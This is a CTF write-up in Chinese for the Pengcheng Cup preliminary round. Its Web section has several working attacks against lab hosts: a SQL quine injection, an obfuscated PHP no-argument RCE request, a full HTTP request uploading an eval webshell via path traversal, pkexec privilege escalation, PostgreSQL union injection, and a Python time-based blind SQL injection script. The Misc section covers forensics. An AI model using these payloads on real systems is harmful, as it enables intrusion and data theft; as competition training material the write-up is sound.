第二届“鹏城杯” 初赛

[TOC]

Web

Ez_Java

赛后发现是二次反序列化绕过黑名单，并且可以利用cc2的链子调用到任意无参方法。
参考
大佬wp

简单包含

绕过Waf，通过Waf对文件和POST参数的混淆bypass，然后直接伪协议读flag。

can_u_login

经典sql自输出，第五空间也考过，参考https://www.anquanke.com/post/id/253570

?password=1' union select(REPLACE(REPLACE('1" union select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!")) --+',CHAR(34),CHAR(39)),CHAR(33),'1" union select(REPLACE(REPLACE("!",CHAR(34),CHAR(39)),CHAR(33),"!")) --+')) --+

简单的php

取反绕过字母字符，然后就是正常的无参rce。

GET /?code=[~%8C%86%8C%8B%9A%92][~%CF]([~%9A%91%9B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]())); HTTP/1.1
aaa: whoami
Host: 192.168.1.111:8220
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: cat /ffffflaggg
aaa: whoami

高手高手高高手

git源码泄露。爆出了后台密码admin/admin123。然后从网上可以找到cms的cve，但源码里有改动，最后上传websehll的poc:

POST /navigate_upload.php?session_id=dj8sd2gm68i5c8fr8s7tnm3tf3&id=....//....//....//navigate_info.php HTTP/1.1
Host: 192.168.1.116
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------336212135019351390254156611980
Content-Length: 507
Origin: http://192.168.1.116
Connection: close
Referer: http://192.168.1.116/navigate.php?fid=files
Cookie: PHPSESSID=dj8sd2gm68i5c8fr8s7tnm3tf3; NVSID_7da51544=dj8sd2gm68i5c8fr8s7tnm3tf3; navigate-tinymce-scroll=%7B%7D; navigate-language=en

-----------------------------336212135019351390254156611980
Content-Disposition: form-data; name="name"

a.png
-----------------------------336212135019351390254156611980
Content-Disposition: form-data; name="engine"

picnik
-----------------------------336212135019351390254156611980
Content-Disposition: form-data; name="file"; filename="a.png"
Content-Type: application/octet-stream

<?php
echo 111;
@eval($_POST['cmd']);
?>

-----------------------------336212135019351390254156611980--

然后下载I_want_capture_the_flag发现需要删除bocai.html和bocai.png。需要提权。
find / -user root -perm -4000 -print 2>/dev/null 发现可以用pkexec.
提权后直接查看/root/flag，然后本地跑一下I_want_capture_the_flag得到flag。

easygo

postgresql注入没有过滤，获取表名为super_secret_table

1' union select 1,tablename from pg_tables where schemaname='public' limit 1; --+

查询flag

1' union select 1,flag from super_secret_table; --+

easy_sql

爆破用户密码，最终用户SuperF1@g和F1@g_1N_Th1S_UsEr_Y0u_Ge7_P@ssW0rd!!!是有用的，剩下几个用户里面没有flag

import requests
import time
import string
url = "http://192.168.1.109/index.php"

# name = "SCA7TERED"
name = "c"
temp = ""
# Cha0s_aaa_bbb_ccc
# SuperF1@g   SuperF1@g_aaa_bbb_ccc
list = string.ascii_letters + string.digits
list = "abcdefghijklmnopqrstuvwxyz{|}~!\"#$%&\'()[\\]^_`*+,-./:;<=>?@A!\"#0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
print(list)
print(len(list))
j=5
re = [114,100,33,33,33]
# ! r c
#rite@Ctfec
while True:
    s = ""
    for o in re:
        s += "," + str(o)
    print(s)
    j = j + 1
    for i in list:
        temp = ord(i)
        # payload = '''or case(right(`name`,{}) <> binary(char({},83, 99, 97, 55, 116, 101, 114, 101, 100))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#'''.format(j, temp)
        # payload = '''or case (right(`pwd`,{})<>binary(char({},67,104,97,48,115,95,97,97,97,95,98,98,98,95,99,99,99))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#'''.format(j, temp)
        # payload = '''or name = "SuperF1@g" or case (right(`pwd`,{})<>binary(char({},))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#'''.format(j, temp)
        payload = ('''or case(right(`pwd`,{}) <> binary(char({}'''+s+'''))) when "1" then "0" else benchmark(100000000,MD5("testestest")) end;#''').format(j, temp)
        print(payload)
        start_time = time.time()  # 注入前的系统时间
        # r = requests.get(url,params = params)
        a = requests.post(url, data={
            "User": '''\\''',
            "Pass": payload
        }, allow_redirects=False)
        # print(a.status_code)
        # print(a.text)
        end_time = time.time()  # 注入后的时间
        # print(end_time - start_time)
        if end_time - start_time > 0.5:
            name = i
            print(name)
            # re.append(ord(i))
            re.insert(0,ord(i))
            # re.reverse()
            print(re)
            break
        else:
            pass

压缩包

通过建立一个同名的文件夹和shell文件，可以绕过检测，上传webshell，直接读flag即可。

Misc

简单取证

首先从cmd历史中可以拿到密码。

然后查看文件，发现secret.jpg
0x0000000002325028 1 0 R–r– \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\secret.jpg
dump后发现是倒叙的zip，用密码解密后，使用gnuplot绘制散点图，得到二维码，扫码得到flag。

what_is_log

输入密码后应该有确定之类的，全局搜一下，发现确实可以搜到

Misc_water

通过图片名，可以联想到倒序的jpg。发现其中有水印，提取出来后，解压压缩包，爆破图片的宽高，得到flag。

babybit

用DiskGenius恢复一下vmdk文件，获取到四个文件

然后用Register Explorer导入SYSTEM读取注册表，在FVEStats找到加解密时间，然后北京时间需要再+上8，最终flag为PCL{2022/6/13_15:17:39_2022/6/13_15:23:46}